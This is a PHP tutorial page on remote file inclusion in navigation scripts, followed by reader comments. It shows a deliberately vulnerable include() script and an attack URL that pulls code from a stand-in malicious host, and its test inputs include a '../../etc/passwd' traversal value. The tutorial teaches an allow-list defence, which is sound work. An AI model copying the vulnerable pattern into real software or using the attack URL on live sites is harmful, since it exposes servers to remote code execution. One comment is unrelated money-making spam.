How to code and understand a more secure navigation script. You have probably seen other PHP navigation scripts that take a page name from the URL and include it. The difference is that those scripts open a security hole on your site: a file inclusion vulnerability (commonly called remote file inclusion, or RFI), which lets a visitor choose which file your server includes and executes.
Here is an example of the dangerous code:
<?php
// Vulnerable: the page name comes straight from the query string and is
// handed to include() without any check on what it contains.
if(!isset($_GET["url"]))
{
    $url = "home";
}
else
{
    $url = $_GET["url"];   // the original relied on register_globals to fill $url
}
include ($url . ".php");
?>
The above code says: if the variable "url" is set, include the page it names; otherwise include the predefined home page. This looks harmless, but nothing restricts what "url" may contain, so a visitor can make the script include a file you never intended.
Here is an example URL: www.yournavscript.com/index.php?url=http://www.maliciouscodesite.com/badcode
The script appends the ".php" extension and calls include() on http://www.maliciouscodesite.com/badcode.php. If PHP is configured to allow URL includes (the allow_url_fopen / allow_url_include settings in php.ini), it fetches that file from the attacker's server and runs it with the permissions of your web server. Even with remote includes disabled, a value such as url=../../some/other/file makes the script include any .php file on the server that the web server can read, because the only thing the script adds is the extension.
I am sure you can see the problems with this result.
Here is the more secure option:
<?php
// Only page names listed in $allowed may ever reach include();
// anything else falls back to $default.
$default = "home.php";
$allowed = array (
    'index',
    'example',
);

if( isset( $_POST["P"] ) || isset( $_GET["P"] ))
{
    // GET wins if both are present; trim strips surrounding whitespace
    $page = trim( isset($_GET["P"]) ? $_GET["P"] : $_POST["P"] );

    // third argument true: exact string comparison, no type juggling
    if( in_array( $page, $allowed, true ))
    {
        $file = $page . ".php";
        if( file_exists( $file ))
        {
            include( $file );
        }
        else
        {
            include( $default );
        }
    }
    else
    {
        include( $default );
    }
}
else
{
    include( $default );
}
?>
$default = "home.php";
The default page that is included.
$allowed = array ( 'index', 'example', );
This is the array of allowed page names (without the ".php" extension); add as many as you need. Only names that appear here can ever be included.
if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
If a "P" parameter was sent (by GET or POST), continue with the script; if not, include the default page.
$page = trim( isset($_GET["P"]) ? $_GET["P"] : $_POST["P"] );
Copies the value of "P" into "$page", preferring the GET value when both are present, and trims leading and trailing whitespace from it.
if( in_array( $page, $allowed, true ))
{
Checks whether the value in "$page" is one of the names in the "$allowed" array. The third argument (true) makes in_array compare with ===, so only an exact string match passes. Note that it is the page name that is checked, not a path: the extension is added only after the check.
$file = $page . ".php";
Sets the value of $file to the filename you are requesting and appends the ".php" extension.
if( file_exists( $file ))
{
include( $file );
}
If the file exists then include the file( "$file" ).
else
{
include( $default );
}
If the name is in the array but the file is not found on disk, include the default file.
else
{
include( $default );
}
}
If the requested name is not in the array, include the default file.
else
{
include( $default );
}
If no request for a page is made include the default one.
That is the end of the script. You now have a more secure alternative for a site with PHP navigation. Fill in the array with your page names and you are ready to go. The important property is that the value from the request is never used as a path on its own: it is only compared against a fixed list, and the list decides what gets included. If you wanted to extend the script you could add a file type checker as well.
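The following is an added example, not code from the original tutorial or its author. It keeps the allow-list idea from the script above but goes one step further: the request value is only ever used as an array key (so it never becomes part of a file path), non-string input such as ?P[]=x is rejected instead of crashing trim(), and the resolved file is checked to lie inside a pages directory. The directory layout (pages/home.php, pages/index.php, pages/example.php) and the function names page_file_for and safe_include_path are assumptions made for this example; it needs PHP 7.1 or later.

```php
<?php
declare(strict_types=1);

// Added example (not the tutorial's code). Assumed, hypothetical layout:
//   pages/home.php  pages/index.php  pages/example.php
// The request value is used only as a key into $allowed; the file name that
// reaches include() is always a literal from this file.

/**
 * Pure lookup: which file name does this request map to?
 * Anything that is not exactly a listed key yields $default.
 *
 * @param mixed                $requested raw $_GET/$_POST value (may be absent or an array)
 * @param array<string,string> $allowed   page key => file name
 */
function page_file_for($requested, array $allowed, string $default): string
{
    if (!is_string($requested)) {
        return $default;                 // arrays, null, etc. are never valid page keys
    }
    $key = trim($requested);
    // array_key_exists is an exact key test; no type juggling on the key
    return array_key_exists($key, $allowed) ? $allowed[$key] : $default;
}

/**
 * Filesystem check: turn a file name taken from the allow-list into an absolute
 * path, refusing anything that does not exist or resolves outside $pagesDir.
 * Returns null when the file cannot be included safely.
 */
function safe_include_path(string $pagesDir, string $file): ?string
{
    $base = realpath($pagesDir);
    $real = realpath($pagesDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $real === false) {
        return null;
    }
    // $real must start with "$base/" (realpath never returns a trailing separator)
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Page key => file name. Add one line per page you want reachable.
$allowed = [
    'index'   => 'index.php',
    'example' => 'example.php',
];
$default  = 'home.php';
$pagesDir = __DIR__ . '/pages';

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs so the lookup can be exercised from the command
    // line without a web server: only the first two resolve to a listed page,
    // everything else (traversal, remote URL, array, missing) falls back to home.php.
    $samples = [
        'index',
        ' example ',
        '../../etc/passwd',
        'http://www.maliciouscodesite.com/badcode',
        ['x'],
        null,
    ];
    foreach ($samples as $sample) {
        printf("%-45s => %s\n", json_encode($sample), page_file_for($sample, $allowed, $default));
    }
} else {
    // Web request: GET wins over POST, as in the tutorial's script.
    $requested = $_GET['P'] ?? $_POST['P'] ?? null;
    $file = page_file_for($requested, $allowed, $default);
    $path = safe_include_path($pagesDir, $file) ?? safe_include_path($pagesDir, $default);
    if ($path === null) {
        http_response_code(500);         // misconfiguration: not even the default page exists
        exit('Page not available.');
    }
    include $path;
}
```

Run the file with php on the command line to see what each constructed input maps to; dropped into a web root as index.php, the same two functions serve real requests. The design point is the split between the pure lookup and the filesystem check: the first can be exercised without any files present, and the second is a safety net that only ever sees names you wrote yourself.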
Stefan Tue Jan 3, 2006 7:01 pm
Awesome tutorial. I already knew this, but it's still good.
p2p Thu Jul 13, 2006 5:07 pm
Where do I put this code? On the navigation or at the top of the page? Or where? I am so confused with this PHP navigation thing... :mad
Matthew Keefe Thu Jul 13, 2006 5:12 pm
You place this code at the top of the page where you would like the HTML to be loaded. You can also place it at any other point where you would want the page loaded. When I used this method I would have one PHP file that loads in a header and footer. Then between those I loaded this navigation script.
php manual Sat Jan 27, 2007 7:58 am
Good article, thanks.
abdullah Thu Jan 31, 2008 6:40 pm
At home, in your home environment,
if you have 2 hours of free time this job is for you. Earning money from the internet at no cost is now very easy. Earn 480 YTL in 7 months. It is time to earn money from the internet.
rick james Tue Feb 5, 2008 9:03 pm
Really clear and concise! Many thanks, keep up the good work.
Robert Popplewell Sun Mar 16, 2008 10:21 am
In the line where you are filling the $page variable with POST or GET data:
$page = ( $_POST["P"] ) || isset( $_GET["P"] );
Should the isset function be used at this point, seeing as it only returns a TRUE or FALSE value?
mkeefe Sun Mar 16, 2008 2:07 pm
@Robert, good point, it doesn't seem to be on the correct line. Actually, it is duplicated for some strange reason. It should simply be:
$page = isset($_GET["P"]) ? $_GET["P"] : $_POST["P"];
I will have that fixed right now. Thanks, Matt
Bas Mon Apr 14, 2008 7:53 am
Whenever I make use of the querystring ($_GET["..."]) I run it through a function that encrypts/decrypts it. Even though the encrypted querystring can still be tampered with, you will be an unguided missile without the algorithm.
mkeefe Mon Apr 14, 2008 8:01 am
@Bas, That is a good tip. Whenever possible it is a good idea to limit what goes across the url, as a good secondary, try using an ID that matches some database parameters or session variables.
©2004 - 2008 scriptplayground | Privacy Policy | Legal